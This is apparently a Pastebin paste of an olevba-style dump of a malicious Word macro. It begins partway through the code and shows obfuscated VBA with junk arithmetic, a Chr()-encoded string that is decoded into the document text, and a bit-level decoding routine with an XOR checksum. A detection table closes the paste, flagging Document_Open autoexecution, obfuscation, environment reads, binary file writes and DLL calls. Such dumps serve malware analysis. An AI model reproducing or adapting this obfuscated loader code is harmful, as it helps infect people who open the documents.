  581. Dim FZuzvL As Long, NCh3bV1jG As Long
  582. FZuzvL = 49
  583. NCh3bV1jG = 21
  584. If FZuzvL + NCh3bV1jG > 4 Then
  585. NCh3bV1jG = FZuzvL + 52
  586. Else
  587. MsgBox 59
  588. End If
  589. ActiveDocument.Range.Text = IqAGSLPUAJG(Chr(160) + Chr(57) + Chr(39) + Chr(10) + Chr(229) + Chr(100) + Chr(122) + Chr(174) + Chr(39) + Chr(208) + Chr(103) + Chr(51) + Chr(13) + Chr(233) + Chr(39) + Chr(11) + Chr(119) + Chr(161) + Chr(3) + Chr(216) + Chr(51) + Chr(108) + Chr(187) + Chr(48) + Chr(227) + Chr(187) + Chr(150) + Chr(253) + Chr(154) + Chr(208) + Chr(222) + Chr(111) + Chr(156) + Chr(30) + Chr(170) + Chr(13) + Chr(35) + Chr(28) + Chr(78) + Chr(168) + Chr(11) + Chr(231) + Chr(120) + Chr(199) + Chr(200) + Chr(168) + Chr(113) + Chr(71) + Chr(228) + Chr(119) + Chr(91) + Chr(43) + Chr(185) + Chr(190) + Chr(95) + Chr(205) + Chr(159) + Chr(110) + Chr(79) + Chr(17) + Chr(30) + Chr(127) + Chr(113) + Chr(251) + Chr(243) + Chr(61) + Chr(134) + Chr(143) + Chr(52) + Chr(172) + Chr(118), "MnVQz4OjUS")
  590. End If
  591. Dim VbtNVJJPmm As Long, YNXWc8Swl As Long
  592. VbtNVJJPmm = 16
  593. YNXWc8Swl = 47
  594. If VbtNVJJPmm + YNXWc8Swl > 4 Then
  595. YNXWc8Swl = VbtNVJJPmm + 27
  596. Else
  597. MsgBox 33
  598. End If
  599. End Sub
  600. Private Sub U4j0Mutcw(IbIZc4MDUIW5() As Byte, M1Ml0uRV0i As Long)
  601. Dim RHz39AqVIzU7yg As Long, W61R5 As Long, H7aK As Byte, BkedkgiyKUZ4u4Smm As Long, Nl4DWWC9qyeKJpT As Integer, NVUaE As Byte, XekBgxC2kS90j8tb() As Byte, Ys77QvqqoN1 As Integer
  602. Dim Ennhv As Long, CKUS2WBcJfv6t As Byte, YGpuGcg2I4kd As Long, OL5rIjPqlH As Long, VqRbjEvtgBC1fKk As Long, AsWQpCZRTgZ(0 To 7) As Byte, K0XNnEawS6lMTQx(0 To 511) As HnF3nxQRcws6HMjP, IAmHO3mQ(0 To 255) As UP6g2cwz9
  603. BkedkgiyKUZ4u4Smm = 1
  604. NVUaE = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
  605. BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
  606. XtJgfXpzM0o 4, VarPtr(YGpuGcg2I4kd), VarPtr(IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1))
  607. BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 4
  608. VqRbjEvtgBC1fKk = YGpuGcg2I4kd
  609. If (YGpuGcg2I4kd = 0) Then Exit Sub
  610. ReDim XekBgxC2kS90j8tb(0 To YGpuGcg2I4kd - 1)
  611. XtJgfXpzM0o 2, VarPtr(Nl4DWWC9qyeKJpT), VarPtr(IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1))
  612. BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 2
  613. For RHz39AqVIzU7yg = 1 To Nl4DWWC9qyeKJpT
  614. With IAmHO3mQ(IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1))
  615. BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
  616. .Jyq7kWxLEuXU = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
  617. BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
  618. ReDim .Psfw7jyizqX2pBr(0 To .Jyq7kWxLEuXU - 1)
  619. End With
  620. Next
  621. AsWQpCZRTgZ(0) = 2 ^ 0
  622. AsWQpCZRTgZ(1) = 2 ^ 1
  623. AsWQpCZRTgZ(2) = 2 ^ 2
  624. AsWQpCZRTgZ(3) = 2 ^ 3
  625. AsWQpCZRTgZ(4) = 2 ^ 4
  626. AsWQpCZRTgZ(5) = 2 ^ 5
  627. AsWQpCZRTgZ(6) = 2 ^ 6
  628. AsWQpCZRTgZ(7) = 2 ^ 7
  629. CKUS2WBcJfv6t = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
  630. BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
  631. Ys77QvqqoN1 = 0
  632. For RHz39AqVIzU7yg = 0 To 255
  633. With IAmHO3mQ(RHz39AqVIzU7yg)
  634. If (.Jyq7kWxLEuXU > 0) Then
  635. For W61R5 = 0 To (.Jyq7kWxLEuXU - 1)
  636. If (CKUS2WBcJfv6t And AsWQpCZRTgZ(Ys77QvqqoN1)) Then .Psfw7jyizqX2pBr(W61R5) = 1
  637. Ys77QvqqoN1 = Ys77QvqqoN1 + 1
  638. If (Ys77QvqqoN1 = 8) Then
  639. CKUS2WBcJfv6t = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
  640. BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
  641. Ys77QvqqoN1 = 0
  642. End If
  643. Next
  644. End If
  645. End With
  646. Next
  647. If (Ys77QvqqoN1 = 0) Then BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm - 1
  648. OL5rIjPqlH = 1
  649. K0XNnEawS6lMTQx(0).O2jX1pn7C = -1
  650. K0XNnEawS6lMTQx(0).Qoey8CXRBAw3 = -1
  651. K0XNnEawS6lMTQx(0).UVv = -1
  652. K0XNnEawS6lMTQx(0).SNovaUJISNL = -1
  653. For RHz39AqVIzU7yg = 0 To 255
  654. GuQHe80AnN K0XNnEawS6lMTQx(), OL5rIjPqlH, RHz39AqVIzU7yg, IAmHO3mQ(RHz39AqVIzU7yg)
  655. Next
  656. YGpuGcg2I4kd = 0
  657. For BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm To M1Ml0uRV0i
  658. CKUS2WBcJfv6t = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
  659. For Ys77QvqqoN1 = 0 To 7
  660. If (CKUS2WBcJfv6t And AsWQpCZRTgZ(Ys77QvqqoN1)) Then Ennhv = K0XNnEawS6lMTQx(Ennhv).Qoey8CXRBAw3 Else Ennhv = K0XNnEawS6lMTQx(Ennhv).O2jX1pn7C
  661. If (K0XNnEawS6lMTQx(Ennhv).SNovaUJISNL > -1) Then
  662. XekBgxC2kS90j8tb(YGpuGcg2I4kd) = K0XNnEawS6lMTQx(Ennhv).SNovaUJISNL
  663. YGpuGcg2I4kd = YGpuGcg2I4kd + 1
  664. If (YGpuGcg2I4kd = VqRbjEvtgBC1fKk) Then GoTo VqRbjEvtgBC1fKk
  665. Ennhv = 0
  666. End If
  667. Next
  668. Next
  669. VqRbjEvtgBC1fKk:
  670. H7aK = 0
  671. For RHz39AqVIzU7yg = 0 To (YGpuGcg2I4kd - 1)
  672. H7aK = H7aK Xor XekBgxC2kS90j8tb(RHz39AqVIzU7yg)
  673. Next
  674. ReDim IbIZc4MDUIW5(0 To YGpuGcg2I4kd - 1)
  675. XtJgfXpzM0o YGpuGcg2I4kd, VarPtr(IbIZc4MDUIW5(0)), VarPtr(XekBgxC2kS90j8tb(0))
  676. End Sub
  677.  
  678. +------------+----------------------+-----------------------------------------+
  679. | Type       | Keyword              | Description                             |
  680. +------------+----------------------+-----------------------------------------+
  681. | AutoExec   | Document_Open        | Runs when the Word document is opened   |
  682. | Suspicious | Open                 | May open a file                         |
  683. | Suspicious | Binary               | May read or write a binary file (if     |
  684. |            |                      | combined with Open)                     |
  685. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  686. |            |                      | strings                                 |
  687. | Suspicious | Xor                  | May attempt to obfuscate specific       |
  688. |            |                      | strings                                 |
  689. | Suspicious | Environ              | May read system environment variables   |
  690. | Suspicious | Write                | May write to a file (if combined with   |
  691. |            |                      | Open)                                   |
  692. | Suspicious | Put                  | May write to a file (if combined with   |
  693. |            |                      | Open)                                   |
  694. | Suspicious | Lib                  | May run code from a DLL                 |
  695. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  696. |            |                      | be used to obfuscate strings (option    |
  697. |            |                      | --decode to see all)                    |
  698. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  699. |            |                      | may be used to obfuscate strings        |
  700. |            |                      | (option --decode to see all)            |
  701. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  702. |            | Strings              | may be used to obfuscate strings        |
  703. |            |                      | (option --decode to see all)            |
  704. +------------+----------------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top